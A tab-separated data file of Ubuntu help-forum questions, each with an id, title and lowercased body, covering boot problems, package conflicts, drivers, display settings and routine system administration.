228696	how to change administrator username ?	i have accidentally typed my name wrong when i created the administrator account . although i managed to change the user name at the login screen , i am unable to rename the /home/oldusername to /home/newusername . i tried most of the online tutorials , and it failed . the code i tried was this : usermod -l newusername -m -d /home/newusername oldusername but the output is : can not lock /etc/passwd ; try again later . how can i fix the issue and change the folder to newusername and expect all the applications to work as before ?
228697	is plugin needed for php code completion in geany ?	i 'm new to geany ide . i have installed basic geany without any plugins from ubuntu software center . i could n't find code completion for php when i press ctrl space . is plugin needed for this functionality ? thanks .
228700	i cant login in ubuntu server after passwd command	i installed ubuntu server using oracle vm on my windows 7 for practicing gnu commands . i used the passwd tool but after using the command i am not able to login into my ubuntu . when i type my password nothing happens . nothing gets written on the black screen . and when i press enter it says _login incorrect_ and one more thing is says _hint : num lock on_ when i tried to change the password into recovery mode it says : _authentication token manipulation error_ i reinstalled my virtual machine but the problem persist .
228709	ubuntu 12.04 ( wubi ) not starting - root.disk corrupted	i have ubuntu 12.04 installed through wubi on my laptop . for some reason when i click on ubuntu on start up ( when you have to either select windows or ubuntu ) i get the following screen , the grub cursor keeps flashing . gnu grub version 1.99-21 ubuntu 3.4 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > could you tell me what i can do to fix this problem and to start ubuntu normally ?
228717	how to install a newer version of jenkins on 12.04 lts ?	i 'm on ubuntu 12.04 and i need to install a version of jenkins greater than the one provided in the ubuntu repositories ( 1.424.6 ) . specifically i at least need version 1.426 ( i want to use api tokens for an external script ) , but i would like to have the newest lts version , 1.480.1 . i can install version 1.424.6 just fine through the default , canonical repositories , but when i try to install jenkins from their instructions , i get no upstart script as expected . how can i install and set up a newer version of jenkins on ubuntu 12.04 ?
228719	ubuntu wo n't appear on laptop startup	i 've recently installed ubuntu along with windows vista . so normally when the laptop is starting up it shows two options whether i want to log on windows or ubuntu . one day i shut down the laptop and i open it the next and it just logs onto windows automatically without giving me the option to choose . i go to check if ubuntu was un-installed or something , but it was still there and everything , but i ca n't open it . i do n't know if there 's any additional info i should add because i 'm not very good with computers , and i do n't want to re-install it because i have my stuff on it so i 'd lose it , and i 'm having trouble backing it up . any suggestions ?
228720	restart memcached and a java server using script	as of now , i am using the following commands to start , kill , restart my application on ubuntu . ps -ef | grep memcached ps -ef | grep java kill -9 `` pid of memcached and java '' sudo nohup java -classpath mcruiseonserver_lib/ -jar mcruiseonserver.jar 10.116.106.126 10.116.106.126 10.116.106.126 2 > & 1 > mcruiseonl.log & /usr/bin/memcached -m 128 -vvv -p 11211 -u 11211 -u ubuntu -d > memcached.log 2 > & 1 & is there a easier way to do this ?
228722	ubuntu 12.10 is n't recognizing the dvd/cd drive	i 've run into the same problem as this guy [ closed-no answers ] : ubuntu is n't recognizing the dvd/cd drive i recently installed 12.10 ( 32-bit ) on a hp elitebook 8560p . i used the odd ( cd/dvd+rw ) to install the os . in the os , i then insert a cd or dvd ( data disks , not audio/movie ) . nothing happens . i do n't see anything from lshw , dmesg , or syslog . what else should i look into ? since at least one other person has/had this issue i know that it 's not just me .
228723	libreoffice vs lotus symphony vs starroffice . what is better ?	i know that all three mentioned office apps are based on openoffice.org . i previously used libreoffice but i had troubles with editing pdfs and importing/exproting ms office documents sometimes . i know that starroffice can edit it ( i have n't tested it ) but starr is not developing now and it 's quiet old . i have n't used lotus symphony and i 'm wondering if it can edit pdfs and how compactible is it with ms office could anyone please help me to make a choise .
228727	xmodmap , keyboard shortcuts , numpad	edit : after frustrations with this , i have decided to take an entire different route , i am no longer interested in this , but am not able to delete it . that said , the problem still exists , and maybe someone else could benefit from an answer to it . my goal is to be able to use the numpad up and down as volume up and down . notice i said numpad up/down not numpad 8/2 , i should still be able to type an 8 and a 2 with the numpad when numlock is on . when i run the command xmodmap -e `` keycode 88 = g kp_2 g kp_2 '' i can type a g with numpad down and press the numlock and then type a 2 with numpad 2 . this is as expected . when i type xmodmap -e `` keycode 88 = xf86calculator kp_2 xf86calculator kp_2 '' i get nothing when i press numpad down and get a 2 when i press numlock and then numpad 2 . the command xev confirms that xf86calculator is assigned to numpad down and that kp_2 is assigned to numpad 2 . i then go to the ubuntu keyboard shortcuts menu and under launchers i select the calculator , with numpad turned off i press numpad down and it registers that i have assigned to the calculator launcher the calculator key ( now numpad down ) , that 's great . when i press numpad down it launchers the calculator , just as it should . but then i press the num lock and press numpad 2 nothing happens . when i press numpad 2 with xev i no longer get kp_2 but instead i get this focusin event , serial 41 , synthetic no , window 0x6600001 , mode notifyungrab , detail notifyancestor keymapnotify event , serial 41 , synthetic no , window 0x0 , keys : 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 the ubuntu keyboard shortcuts did assign my shortcut properly but seems to be stopping me from typing a 2 with the numpad . i would also be happy assigning the volume controls to f* keys , but i would have to have a way to still use all my f* keys in other applications . i want to volume controls to be a single key , no key combinations . thanks !
228731	lenovo b570e release recommendation	i 'm wondering what release is more stable in terms of hardware drivers support for a lenovo b570e , 12.10 or 12.04 ? i have a 64 bit system but i see on the website the recommended version is 32bits . i 'm a little bit confused , actually what i need to know is which one is better for hardware components support .
228733	alternative shades $ path ?	i 've install jdk now with this reference . according to that i have to add jdk directory to path variable and add an alternative via update-alternatives . i 've done that and everything is fine . but there is one thing that is not clear for me : when i type which java bash returns only /usr/bin/java but tells nothing about usr/bin/jvm/java-6-oracle/bin despite this folder is in the path variable and as i see , bash should have find java also there and mention it in the output . can anybody explain why there 's such a `` shade '' ? thank you .
228734	samba 3.6 and samba4	i have installed ubuntu 12.10 and samba 3.6 ( the version of samba that is installed for ubuntu 12.10 , by default ) . everything works fine . i can access shared folders and shared printers of windows pcs . i read that samba4 provide access and login to activedirectory of windows server ( more fluent access that samba 3.6 ) , so i want install samba4 . can i replace samba3.6 with samba4 ? or can i install samba4 alongside samba3.6 ? samba4 ( samba ) is the next version of samba 3.6 ( smb ) or are differents packages and services ? samba4 provide all the same functionality that samba 3.6 plus all the functionality to access and use activedirectory ? samba3.6 provide access to activedirectory ? i decided to test samba4 and i tried to remove samba 3.6 . everything was fine until i tried to remove libwclient ( or libwclient0 ) . when i mark it to be removed in synaptic , i get a notice that is necessary to remove kde-runtime , mplayer , k3b , gecko , gnome mplayer , lubuntu-desktop , etc , etc . so i did n't remove and i reinstalled all of samba3.6 what happen if i remove samba3.6 completly ( libwclient ( or libwclient0 ) too ) , what happen with this software ( kde-runtime , mplayer , k3b , gecko , gnome mplayer , lubuntu-desktop , etc , etc ) can i install samba4 and get all the same functionality that samba3.6 ( access to shared folders and printers of windows ) plus activedirectory and reinstall all that software ( kde-runtime , mplayer , k3b , gecko , gnome mplayer , lubuntu-desktop , etc , etc ) and this software will with samba4 instead of samba3.6 ? ( sorry for my english ) thanks , alejandro
228739	sharing files over internet	i 'm running a headless ubuntu server at home , and i 'm wondering if there 's any good programs for having a website with your files on it . basically like twonky , except less awful .
228744	do a release upgrade 10.04 to 12.04 lts in a byobu / screen session	i am about to do a release upgrade on a 10.04 server to 12.04 . i am going to need to do this over ssh , is it advisable to do this in a byobu / screen session in case of any unforeseen disconnects ? or will doing this in a screen session bring in an extra layer of improbability ? thanks .
228747	add a menu item to kde launcher	i 've installed eclipse framework not as binary package ( tar.gz ) , user have to only extract to desired directory and start off . i added eclipse destination path to global path variable and i 'm able to start eclipse from command-line without specifying all the path . but i also want eclipse to appear on kickoff application launcher . and be able to start it from quick start ( alt-f2 ) . what steps should i follow ? i 'm using kde 4.9.4 on kubuntu 12.04 thank you !
228749	how to install iodbc in ubuntu 12.10	i need to install the library iodbc ( depends on libodbc2 ) in my quantal machine . yet there is creepy dependency problem . this was replaced somehow by unixodbc which i do n't have , installed . here is what i get when i try to install : sudo apt-get install libiodbc2-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libiodbc2-dev : depends : libiodbc2 ( = 3.52.7-2build2 ) but it is not going to be installed depends : iodbc ( = 3.52.7-2build2 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i can tell that iodbc conflicts with odbcinst . yet , i can not remove it due to the following : sudo apt-get remove odbcinst reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : akonadi-backend-mysql calligra-l10n-engb kde-l10n-engb kdevelop-l10n kdevelop-php-docs-l10n kdevelop-php-l10n libakonadi-kabc4 libakonadi-notes4 libakonadiprotocolinternals1 libboost-thread1.49.0 libdmtx0a libgpgme++2 libkcalcore4 libkdgantt2 libkholidays4 libkimap4 libkldap4 libkmbox4 libkmime4 libkolabxml0 libkpgp4 libkresources4 libksieve4 libprison0 libqgpgme1 libqrencode3 libxerces-c3.1 use 'apt-get autoremove ' to remove them . the following packages will be removed : akonadi-server k3b k3b-i18n katepart kde-runtime kdelibs-bin kdelibs5-plugins kdepim-runtime kdepim-strigi-plugins kdepimlibs-kio-plugins kdoctools kget kmag kmail kmix kmousetool ksystemlog kubuntu-debug-installer language-pack-kde-ar language-pack-kde-en libakonadi-calendar4 libakonadi-contact4 libakonadi-kcal4 libakonadi-kde4 libakonadi-kmime4 libcalendarsupport4 libincidenceeditorsng4 libk3b6 libkabc4 libkactivities-bin libkactivities6 libkalarmcal2 libkatepartinterfaces4 libkcal4 libkcalutils4 libkcddb4 libkde3support4 libkdepim4 libkdepimdbusinterfaces4 libkdewebkit5 libkemoticons4 libkfile4 libkgapi0 libkhtml5 libkio5 libkleo4 libkmanagesieve4 libkmediaplayer4 libknewstuff3-4 libknotifyconfig4 libkolab0 libkonq-common libkonq5abi1 libkontactinterface4 libkparts4 libkpimidentities4 libkpimtextedit4 libkpimutils4 libkprintutils4 libksieveui4 libktexteditor4 libktnef4 libktorrent4 libkworkspace4abi2 libkxmlrpcclient4 libmailcommon4 libmailimporter4 libmailtransport4 libmessagecomposer4 libmessagecore4 libmessagelist4 libmessageviewer4 libmicroblog4 libnepomuk4 libnepomukcore4abi1 libnepomukquery4a libnepomuksync4 libnepomukutils4 libplasma3 libsoprano4 libtemplateparser4 libvirtodbc0 nepomuk-core odbcinst odbcinst1debian2 plasma-scriptengine-javascript qapt-batch soprano-daemon virtuoso-minimal 0 upgraded , 0 newly installed , 89 to remove and 0 not upgraded . after this operation , 126 mb disk space will be freed . do you want to continue [ y/n ] ? other info : why do the `` iodbc '' and `` libmyodbc '' packages conflict with each other ? the root problem is that i need to use a new feature introduced in the latest mysql workbench builds ( db migration ) which uses odbc for that matter . here is what mysql doc says about it : linux the migration wizard uses iodbc as a driver manager for all of its odbc connections in linux . this may give you some troubles because most linux distributions provide odbc drivers compiled against unixodbc . this is another driver manager not supported by mysql workbench so you wonât be able to use those drivers unless you compile them against iodbc . hereâs what you should do . make sure that you have iodbc installed . if you are using debian , ubuntu or another debian based distro , type this command in your terminal : $ > sudo apt-get install iodbc libiodbc2-dev libpq-dev libssl-dev for rpm based distros ( redhat , fedora , etc . ) type this command instead of the previous one : $ > sudo yum install iodbc iodbc-dev libpqxx-devel openssl-devel now we need to install the postgresql odbc drivers . download the psqlodbc source tarball from here . use the latest version available for download . as of this writing the latest version corresponds to the file psqlodbc-09.01.0200.tar.gz . extract this tarball to a directory in your hard drive and open a terminal and cd into that directory . type this in the terminal window : $ > ./configure -- with-iodbc -- enable-pthreads $ > make $ > sudo make install verify that you have the file psqlodbcw.so in the /usr/local/lib directory . this package seems to pose the problem probably : dpkg -s odbcinst1debian2 package : odbcinst1debian2 status : install ok installed priority : optional section : libs installed-size : 241 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : amd64 multi-arch : same source : unixodbc version : 2.2.14p2-5ubuntu4 replaces : unixodbc ( < < 2.1.1-2 ) depends : libc6 ( > = 2.14 ) , libltdl7 ( > = 2.4.2 ) , odbcinst pre-depends : multiarch-support breaks : libiodbc2 , libmyodbc ( < < 5.1.6-2 ) , odbc-postgresql ( < < 1:09.00.0310-1.1 ) , tdsodbc ( < < 0.82-8 ) conflicts : odbcinst1 , odbcinst1debian1 description : support library for accessing odbc ini files this package contains the libodbcinst library from unixodbc , a library used by odbc drivers for reading their configuration settings from /etc/odbc.ini and ~/.odbc.ini . . also contained in this package are the driver setup plugins , which describe the features supported by individual odbc drivers . homepage : http : //www.unixodbc.org/ original-maintainer : steve langasek < vorlon @ debian.org > i have no broken packages :
228752	gmail checker on 12.10	is thee any gmail checker that works on 12.10 ? i just want blue icon in app indicator when i have unrad emails , nothing more . update : i just realized there are desktop notifications supported in gmail out of the box .
228756	ubuntu 12.04 failing to boot	can someone please help ? i have been using ubuntu 12.04 perfectly fine for the past 3 months . for no apparent reason it is failing to boot and i am getting the following messages just before the login screen appears : *stopping save kernel messages [ ok ] *starting cups printing spooler/server [ ok ] *stopping anac ( h ) ronistic cron [ ok ] *stopping system v runlevel compatibility [ ok ] the process stops here and i can only turn off the machine by holding down on the start button . i have a dual boot on my laptop with windows 7 and this works fine . i would be grateful for some advise on this as i need to access my ubuntu files as soon as possible . many thanks in advance !
228758	ubunbu one - safe recovery of backups	during the years , i 've had computer crashes . right now i am too scared letting synchronization and its systematic recover the precedent 3 computers backup from ubuntu one cloud . i would like to proceed at safely recovering of the data files into my existing files system without over-writing ?
228760	ubuntu 12.04 : samsung ml-2955dw not print	after installing and configuring `` unified linux driver '' from the samsung website the printer does n't print . i 'm using 12.04.1 . in the printer driver list , even after installing the `` unified linux driver '' i ca n't found the exact model . i have tried other drivers like ml-3050 , ml-3051 , ml-2950 , ml2855nd ) but the printer does n't work . it only prints strange symbols . if i try i test page it says that the driver is wrong . i have xsane and gs , the dependencies requested by samsung software installed . how can i solve this problem ? . should i install another driver ? original question in spanish : al instalar los controladores para linux de la impresora samsung `` unifiedlinuxdriver_0.92.tar '' ( descargados desde http : //www.samsung.com/ar/support/model/ml-2955dw/xbg-downloads ? ismanualdownload=true # ) y luego de configurar la impresora como sugiere por defecto el unified linux driver provisto por samsung la impresora no imprime . tengo en mis pcs linux ubuntu 12.04.1 como so . lo que pude observar es que en la lista de controladores luego de instalar el software de samsung `` unified linux driver '' es que no aparece el modelo exacto de la impresora ml-2955dw . si bien probé con otros controladores ( como ser : ml-3050 , ml-3051 , ml-2950 , ml-2855nd ) la impresora no me funciona correctamente , envío a imprimir e imprime varios símbolos raros y no los datos enviados . al enviar a imprimir la página de prueba sale una hoja que dice que el controlador utilizado es incorrecto . la consulta sería que controlador debería utilizar o cómo puedo solucionar este problema . tengo xsane instalado y gs que son los requisitos solicitados por el software de samsung . desde ya muchas gracias .
228762	programs autostarting , but not in list ?	background : whenever i log into my account , gmusicbrowser and two chromium windows open . i checked my list of autostarting programs in the settings manager , and they are n't in it : question : why are these opening ? what can i do to stop them from opening ?
228763	how to delete grub entirely from grub rescue . boot windows only	i had installed ubuntu ( twice actually ) onto the same drive . i wanted to 'try again ' since one of them did n't install correctly and the other installed differently , but it worked . i was getting frustrated with the grub menu because it was really sloppy ( there were two windows loaders-one with the windows boot loader to go into ubuntu-2 different versions of ubuntu-from the first install for some reason- the memtest , etc. ) . in my attempts at getting rid ubuntu to do a fresh installation , i went ahead and deleted the partions that were n't the swap or main via windows 7 . as i said , i am a noob . now , even though i though i completely got rid of ubuntu , which includes the grub menu , when i boot my pc i am brought directly to the grub rescue . and from what i 've found from other forums , the grub rescue is n't even completely functional for me ( it does n't recognize any commands that it should support besides 'ls . ' it also returns and 'unkown filesystem ' for any partition i try to view or boot . ) is there any way that i can boot straight into windows ? i fear i may have gone about deleting those partitions in the wrong way . if so , what are my options ?
228764	xscreensaver locking issue	i recently switched from gnome screensaver to xscreensaver and i have been facing problems in making xscreesaver lock my session when i suspend my system . can anyone help me figure this out ?
228767	is ubuntu only for laptops ?	i have downloaded ubuntu a long time ago on my windows 7 pc and it did n't work properly . and now im afraid to download it on my windows 7 lenovo laptop , because it could get ruined . please help . and how does the usb stick ubuntu work ?
228770	installing ubuntu desktop on usb stick	trying to install ubuntu desktop on a usb stick but i do not succeed . first time i tried , the usb stick contained an installation of usb server and i wanted to start over again . however , it complained about partioning . removed all the partitions from the stick and tried again , hoping that the installer would help me out with partioning ... but now the usb stick did not show up at all ... created one partion ntfs on the usb stick and tried again but the only `` automated '' alternative i get for installing is to overwrite or add ubuntu to my hdd which already contains windows , something that i do not want ... do i need to manually create partions on the stick in the installer ? which partitions should i create ? the usb stick is 8gb and the machine that i will test it on has 8gb memory . helpful for any support here . regards , tobbe g
228773	how can i turn off alt-right mouse button function in 12.10 ?	by default the key-mouse combination activates the window menu . the `` activate the window menu '' shortcut is currently set to `` alt+space . '' the alt-rmb key combo is used in blender for selecting edge loops .
228782	installing ubuntu 12.10 alongside vista	during repartitioning there was an error and after sending the error report my screen went black . back in vista and everything seems ok but not sure what happened or how to proceed with a second attempt . i 'm a total noob here so any info appreciated . explain it to me like i 'm five .
228788	what wireless adapter can i use for installation ?	i 'm new to linux and i want to install it on a couple of desktop computers i am no longer using . ( pentium 4 , 2gb ram each ) . is there a wireless usb adapter i can use to be connected to my wifi during the installation ? i have a couple of old ones lying around ... linksys and netgear . any chance one of these might work ? thanks in advance .
228789	change from tri-boot to dual-boot	i have been tri-booting windows 7 , windows 8 release candidate and ubuntu 12.04 lts for a few months now . i have decided that , since i have no touch screen , i will not purchase win 8 . i now want to get rid of the win 8 rc , then add that partition space to my ubuntu partition , but have no idea how to accomplish this . do i need to uninstall win 8 rc from within windows first ? the grub loader sends me to the win 8 loader , where i have win 7 as the default . does that complicate things ? any assistance anyone can give would be greatly appreciated .
228793	how to reverse tether the internet connection via wifi	how to share by internet ( from my internal gsm card ) via wifi ? i can share my gsm internet from android , but whats about the other way around ?
228798	youtube-dl not performing as expected on 12.10	when i type the video url , it bring out this message instead of download . please what do i do because i really need to start downloading videos . joshua @ joshua-hp-625 : ~ $ youtube-dl http : //www.youtube.com/watch ? v=h3gpo7qfofw & feature=player_detailpage [ 1 ] 6720 joshua @ joshua-hp-625 : ~ $ hi ! we changed distribution method and now youtube-dl needs to update itself one more time . this will only happen once . simply press enter to go on . sorry for the trouble ! the new location of the binaries is https : //github.com/rg3/youtube-dl/downloads , not the git repository .
228802	boot menu frozen	after installing ubuntu 12.04 through windows installer ( wubi ) the boot menu is frozen to windows7 entry . keyboard or mouse does n't work at all . any solutions ?
228805	how do i install ubuntu on a second hard drive ?	i am going to be buying a second hard drive for my desktop here pretty soon , because my current hard drive is a piece of junk running windows 7 . what i want to know is how to install ubuntu on the second drive . i am looking for a non complicated answer as i am not familiar with the ubuntu lingo . i am so sick of windows.. i used ubuntu before but it did n't work properly . when i installed it , it said i did n't have enough space ... even tho i had 600gb to use . anyway if anyone can help me out it would be much appreciated . thanks
228808	xrander problem with 1900x1080p	i have a problem with xrandr i successfully executed the following : # cvt 1900 1080 # xrandr 1900x1080 170.75 1904 2024 2224 2544 1080 1083 1093 1120 -hsync +vsync but unfortunately the following command : # xrandr -- addmode vga-0 1900x1080 returned the following error : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 the following command output might help in identifying problem : # glxinfo |grep -i opengl opengl vendor string : nvidia corporation opengl renderer string : geforce 310m/pcie/sse2 opengl version string : 3.3.0 nvidia 310.14 opengl shading language version string : 3.30 nvidia via cg compiler opengl extensions : # lspci |grep -i vga 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 310m ] ( rev a2 ) any ideas what 's gon na be wrong ?
228809	low graphics error	i recently upgraded to 12.10 ( fresh install ) . i am a facing weird problem : when i boot , i get a message notifying me of low graphics . for now , i have been switching to console using alt+f1 and then rebooting . upon reboot , i select recovery mode , allow system to boot and then again reboot . now i select normal mode and my graphics load smoothly . could you please tell me what could be the issue ? i have a dell inspiron 5230 with intel 4000 onboard graphics .
228816	i can not change the screen brightness	here 's my problem : ever since i installed ubuntu 12.10 on my computer i have n't been able to change the screen brightness , it was always set to the maximum . i did take a look at this post : decrease backlight below minimum and it helped me resolved the issue with the unbearable brightness , however one problem persists : i can not change it through `` brightness & lock '' or the function buttons ( f2 and f3 ) , when i press the buttons , the animation shows up but nothing happens . i tried the following : http : //www.refreshit.info/2012/08/solved-brightness-increase-and-decrease.html it did nothing ... if it helps : i have an hp-dv6 6185la , it has an ati radeon 6770m hd card and an intel hd integrated graphics card it only detects the `` intel速 sandybridge mobile '' thanks in advance .
228820	define outgoing ip address when using ssh	i have an ubuntu server machine ( 12.04 ) with 4 ip addresses for different websites that require unique ssl certificates . i sometimes ssh out from this box and the box i am going to i have to tell it what ip address i will be coming from . how do i specify which of the 4 ip addresses i want to use as my outgoing ip address ? if i do an ifconfig it appears that i am going out as the last ipaddress . i guess you would want to specify either the address or the interface ... . thanks in advance ! -mark
228821	bcm4311 wireless not working with drivers installed	i installed ubuntu 12.10 on my old compaq/hp preario v3000 to replace windows xp . every thing works fine except i 'm getting no wireless network options in the network drop down menu . i 'm using a cable at the moment . wirless chipset is : 05:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) 08:08.0 ethernet controller : intel corporation pro/100 ve network connection ( rev 02 ) i ran rfkill : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no i also ran iwconfig and got this lo no wireless extensions . eth0 no wireless extensions . in the additional drivers it says : `` using broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source ( proprietary ) '' any help to resolve the problem would be greatly appreciated .
228824	system network service uncompatable after harddrive change and format	after changing out the hard drive in my dell optiplex 750 , and reinstalling ubuntu , my computer tells me the system network services are not compatable . because my cd drive does not work , i installed this by placing the hard drive in another computer an dusign the mini.iso to install it . i need networking capabilities becuase i want to use this computer as a web server . the on-board ethernet card is a intel 82566 something . if you need more information , and can tell me how to get it , just ask . please help .
228827	connecting to a tty from another computer	how do i access one of my ttys from a computer on my home network ? for example , if my ubuntu pc is running , and i want to access it 's terminal from my mac or windows pcs that are on the same network .
228831	customized distributable packages	my aim is to have all my installed software packages in a distributable cd / dvd fashion , so that i can install a clean ubuntu 12 on any system and then use the distributable package cd to get me all that i want .
228832	lirc : irsend send_once does n't work	i 'm trying to figure out why this does n't work : ( 1 ) irsend send_once logitech key_volumeup but this does : ( 2 ) irsend send_start logitech key_volumeup ; sleep 1 ; irsend send_stop logitech key_volumeup it 's odd since 2nd command makes my tv change volume by only 1 step , instead of expected few . this behavior fits more command # 1 , but for unknown reasons it does n't work at all ( though i can see on my camera , that ir is sent ) anyone had and solved similar problem ?
228836	error mounting /boot leads to loss of wirelss ?	i think i 've seriously borked ubuntu 12.10 . it started when i tried to shift from the tested nvidia driver to the experimental one . something went wrong in the installation , so i reverted back to the tested one . this reversion produced an error too . i rebooted and found a thick black border round the screen . i then tried to re-install ubuntu , but keeping my files . i managed to re-install ubuntu , but during the reboot i got a message : '' an error occurred while mounting /boot . press s to skip mounting or m for manual recovery '' i skipped it , but now not only do i have the black lines around my screen , i also ca n't connect to my wireless network despite it being able to see the connection . does someone know what 's going on ? edit : i 've managed to get rid of the mounting message by going to disks , selecting the hard disk , going to the little cog icon > edit mount options then switching to sutomatic mount options . no luck with wireless yet though . okay - latest update i think i 've solved it . do n't know what was going on , but i reinstalled ubuntu 12.10 . first time i tried , i had to disconnect the wireless connection towards the end where it got stuck , then when i booted i still did n't have wireless . the second time i did it i enabled wireless , but not updates , for the whole process minus the sticky bit towards the end , where i turned wireless off briefly then put it back on again . took a long time , but on boot i have wirless . final challenge is to get the nvidia driver up and running as opposed to nouveau . nvidia driver being downloaded through software centre right now should solve it .
228837	from command line without internet how to install software from the installation dvd ?	i do n't have an internet connection . i 've installed ubuntu 12.10 server on one machine . from the command line appreciate your help for how to select/install additional software and/or libraries from the installation dvd media ?
228839	how to install minecraft on powerpc lubuntu 12.10 ?	i 'm using the powerpc version and also using an imac g3 with nearly a gig of ram and a 40gb hard drive as well as a new wifi card . how do i install minecraft on this machine ?
228840	how to modify partitions after install ?	i wanted to have ubuntu with full disk encryption on one big partition , and windows on a small one . in 12.04 , only the server edition installer has full disk encryption , so i used that and then installed ubuntu-desktop . when it asked for the size , i reduced it from ~999gb to ~750gb . now after the install , on both gparted and disk utility i see /dev/sda2 taking ~931gb , and nothing unallocated , so i ca n't create a partition for windows . i got the size right , because when i right-click inside a folder , then hit 'properties ' , i see free space : ~690gb ( i do n't know why it 's not ~750gb , but at least it 's not > 900 ) . the command df -h shows the same . so what can i do ? normally i would just resize a partition with gparted to create unallocated space , then create the partition . but here i have two problems : gparted does not seem to be showing the correct values , and also it says it does not support luks so i 'm afraid it will mess things up . any thoughts ?
228841	what ubuntu-compatible software is available to remove shaking from a video ?	i 've got some some home movies that look great , but my video camera does n't have one of those fancy new stabilizers . is there extant end-user software ( preferably floss ) i could use to removing the shaking ?
228846	wallpapers are not fully `` zoomed '' ( awsetbg -f ) in awesome	when i set my wallpaper in awesome using awsetbg -f and in the theme.lua , most wallpapers are not `` zoomed '' ( as if you were to set a wallpaper and make it zoomed , tiled , etc. ) . it is shown as tiled . i can see the full wallpaper , and the beginning of the wallpaper to it ; s right ( sorry i 'm fixing my screenshot functionality ) . how can i make it so that i can see only `` one wallpaper '' ? how can i make it `` zoomed '' ? thanks .
228847	gnome-terminal , shift+enter interpreted as shift+enter	i use the gui emacs and shift+enter evaluates the current line in r ( ess-mode ) . i 've recently started using emacs -nw in gnome-terminal and shift+enter gets interpreted as enter i.e c-h-k for shift+enter is ret . how can i force gnome-terminal to interpret shift+enter as enter ?
228849	pygtk to pygi : gtk.timeout_add equivalent	i have converted some python code to use pygi but i ca n't figure out how to convert this line : gtk.timeout_add ( ping_frequency * 1000 , self.dowork ) to by clear , since i do n't really know the difference between pygtk and pygi , my new code uses from gi.repository import gtk from gi.repository import appindicator3 as appindicator as shown here https : //wiki.ubuntu.com/desktopexperienceteam/applicationindicators # python_version the full code i am trying to convert is here http : //pastebin.com/raw.php ? i=autasrpy what is the equivalent of gtk.timeout_add ( ping_frequency * 1000 , self.dowork ) in pygi ? i am also assuming pygi is the most modern way to make a unity indicator i also assuming that it is best for the indicator to check the state of something rather than for something to tell the indicator the state ( push vs pull ) . is it okay to have a python program checking something every second ? thanks !
228852	autologin not working on gdm with ubuntu 11.10 and 12.04	i would like to know how to make gdm to autologin with the default ( and only ) account . i use it with gnome3 on my 2 machines ( one with 12.04 and the other with 11.10 ) . i have selected to auto-login on the system settings but it does n't work . ps : installing kdm or lightdm is not a solution since i prefer gdm .
228853	poor font rendering in browsers on 12.04	i 'm using a lenovo b570e . i 've installed the mesa-utils for the graphic driver because it was n't recognized by default . now i have this : graphic card : intel速 sandybridge mobile x86/mmx/sse2 . i do n't know if it 's just my impression but i think all the images are a little bit pixelated and i think it have something to do with the drivers . maybe is not the correct driver associated with it , i 'm saying this because when i was on windows 7 the name of the driver was something like `` intel hd graphics ... '' any suggestions ? thank you ! later edit : this seems to happen only in browsers .
228854	how to move window control buttons to unity panel ?	ubuntu 12.04 i have tried doing this by compiz and ubuntu tweak tools but have n't been able to find the option ... is it possible to move the window control buttons ( x [ ] and - ) to the very top left into the unity panel ? see in the image below where there is a close/minimize and maximize/restore buttons on the very top left , and there are also another set of control buttons on the window border ( on chromium and vlc ) . i want all of them to appear on the very top left and remove the window control buttons from the default window . related questions : opposite of what i 'm trying to do : can i remove the buttons ( min , max , close ) from the unity panel and put them back on the window ? less related questions : how to get the old menu in ubuntu 11.10 how do i disable the global application menu ?
228855	i have no sound in acer acpire timelinex with nvidia optumis . geforce 450m cuda	i have windows 7 installed on my laptop and today i have just installed xubuntu . i had several problems with this system . my laptop worked reaaally slow so i had to switch from unity 3d into 2d . it works somehow properly now . i have no sound . i dont even have the mixer icon in the panel . what are the first steps i got ta to to fix this ? i am new in linux system just have taken the unix class thats it .
228856	ca n't download wubi	i want to download ubuntu with wubi but , the wubi download page redirects here and this page does n't load anymore .
228859	will we ever see full support for nvidia optimus on linux ?	i 've been trying to wait patiently for a while . i want to use linux a lot , but i do n't want to get slower graphics . i paid extra for my graphics card , so i want to get as much gusto as i can . thanks ! i know there 's project bumblebee , but that 's still incredibly slower than windows .
228866	creating a new partition by resizing /dev/sda1	i have the partitions in my computer ( 11.10 ) as follows . /dev/sda1 mountpoint-root ( / ) flags-boot 148gb /dev/sda2 1gb /dev/sda5 1gb i have 70gb free space on /dev/sda1 . i want to create a 10gb partition here to keep my documents because i 'm planning to install 12.04 . when i try to do it with gparted partition utility it does n't let me unmount /dev/sda1 in order to resize it and create a new partition . please give me suggestion on what to do .
228871	why ca n't i delete an item ( in this case a java tar.gz ) file of usb live boot for xubuntu 12.10 ?	i am booting xubuntu 12.10 off a live usb and can not delete a tar.gz file , every time i try to delete the file it says it can not find or create the trash directory : ( is there anyway to fix this so i can free up space on my usb ? thanx !
228876	how do i make the login screens and boot splashes match when installing different desktops ?	i wanted to try out different desktop environments so i installed xfce , kde , gnome , etc on top of unity in ubuntu 12.04 after a while i decided that i did n't like those other des and would stick to unity . so i changed my default de to unity by configuring gdm . sudo dpkg-reconfigure gdm now i am able to choose my de at login time and all of des are working properly . but the strange thing is that my boot up screen says 'lubuntu ' , my login screen is kde , and my desktop is unity . how and why is this happening ? why did n't my gdm configuration have any effect ? does login and boot up screen need to be configured separately from the de ? there are other similar questions here but they are not the same as this one . i do not want to remove the other enviroments i 'm quite happy with having a list of des to select from . i want to know how to set proper defaults .
